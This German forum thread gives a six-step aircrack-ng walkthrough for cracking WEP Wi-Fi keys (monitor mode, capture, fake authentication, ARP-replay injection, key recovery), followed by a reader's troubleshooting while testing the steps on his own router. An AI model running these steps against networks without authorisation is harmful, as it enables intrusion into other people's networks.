Sie sind nicht angemeldet.

1

Donnerstag, 1. März 2012, 17:06

WEP Verschlüsselung knacken mit Aircrack in 6 simplen Schritten


Kurze Beschreibung wie in 6 simplen Befehlen das Aircrack Tool für eine Decodierung der WEP-Verschlüsselung eingesetzt werden kann. Das ganze dauert im Normalfall keine 5 Minuten!

1. Konsole öffnen & Wlan Adapter in Monitor Modus setzen
Befehl: airmon-ng
Befehl: airmon-ng start wlan0

2. Wlan Netz nach AP's scannen
Befehl: airodump-ng mon0

3. AP sniffen & cap-datei erzeugen
Befehl: airodump-ng -c (channel) -w (filename cap-datei) --bssid (Nr. der BSSID) mon0

4. neue Konsole öffnen & fake authentication starten
Befehl: aireplay-ng -1 0 -a (Nr. der BSSID) mon0

5. ARP-request Attacke starten um Traffic zu erzeugen
Befehl: aireplay-ng -3 -b (Nr. der BSSID) mon0

6. neue Konsole öffnen & Aircrack-ng WEP Password decodieren
Befehl: aircrack-ng (filename cap-datei)

Video WEP Key decodieren mit Aircrack und Backtrack5

Viel Spass!

:thumbup:


2

Sonntag, 22. März 2015, 09:30

re

Hi,
ich hab mich immer gefragt wie man ein Wlan Hackt, und bin dabei auf diese Seite gestossen:

Dann hab ich eine alte FritzBox rausgekramt und diese mit der WEP Verschlüsselung ins Netzgehangen, und wollte nun mal versuchen mit der Anleitung die Verschlüsselung zu knacken.


Dafür hab ich mir einen KALI Stick erstellt und bin nach der Anleitung vorgegangen, das erste Problem hab ich dann bei Punkt 4:

Zitat


4. neue Konsole öffnen & fake authentication starten

Quellcode

1
aireplay-ng -1 0 -a 00:15:0C:F5:87:4C mon0


da bekomme ich diese Meldung;

Zitat


No source MAC (-h) specified. Using the device MAC (AC:82:89:1D:954)
21:45:25 Waiting for beacon frame (BSSID: 00:15:0C:F5:87:4C) on channel -1
21:45:25 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).


Worauf hin ich versucht hab den Negative One Channel zu patchen, mit dieser Anleitung
compat-wireless [Aircrack-ng]
Das läuft auch alles ohne Fehler durch, wenn ich dann Punkt 4. aber wiederhole kommt der gleiche Fehler.

Was könnte da falsch laufen, bzw. wie kann ich es prüfen?

Ich habs dann aber auch mal mit diesem Befehl ohne das patchen versucht:

Zitat

aireplay-ng --ignore-negative-one -1 0 -a 00:15:0C:F5:87:4C -e "FRITZ\!Box SL WLAN" mon0

dann bekomme ich diese Meldung:

Quellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
20:36:54 Sending Authentication Request (Open System) [ACK]

20:36:56 Sending Authentication Request (Open System)

20:36:58 Sending Authentication Request (Open System) [ACK]
Attack was unsuccessful. Possible reasons:

 * Perhaps MAC address filtering is enabled.
 * Check that the BSSID (-a option) is correct.
 * Try to change the number of packets (-o option).
 * The driver/card doesn't support injection.
 * This attack sometimes fails against some APs.
 * The card is not on the same channel as the AP.
 * You're too far from the AP. Get closer, or lower
 the transmit rate.


Was mache ich falsch?

Danke

3

Mittwoch, 15. April 2015, 21:14

hi denke nicht das du unbedingt was falsch machst, denn es kann an mehreren ürsachen liegen wenn das nicht funktioniert, auch einfach nur am Router bzw. dessen Einstellungen. Versuch das mal mit einem anderen AP.

Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower

gruss

4

Sonntag, 23. April 2017, 04:16


Thema bewerten
Besucherzhler code